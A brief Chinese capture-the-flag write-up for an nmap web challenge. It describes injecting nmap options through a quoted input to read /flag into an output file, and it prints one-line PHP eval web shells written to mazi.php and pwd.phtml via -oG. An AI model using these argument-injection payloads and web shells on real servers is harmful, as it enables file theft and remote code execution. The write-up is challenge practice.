Web
0x01 nmap
查看源码提示:
研究了半天分隔符绕过,后来放弃了,根据题目提示(127.0.01,不用扫外网),尝试扫描/flag并尝试将其输出到1.txt中
-iL /flag -oN 1.txt
尝试失败之后继续尝试闭合一下
127.0.0.1' -iL /flag -oN szgyy.txt '
传马
' <?php @eval($_POST["mazi"]);?> -oG mazi.php '
' <?= @eval($_POST["password"]);?> -oG pwd.phtml '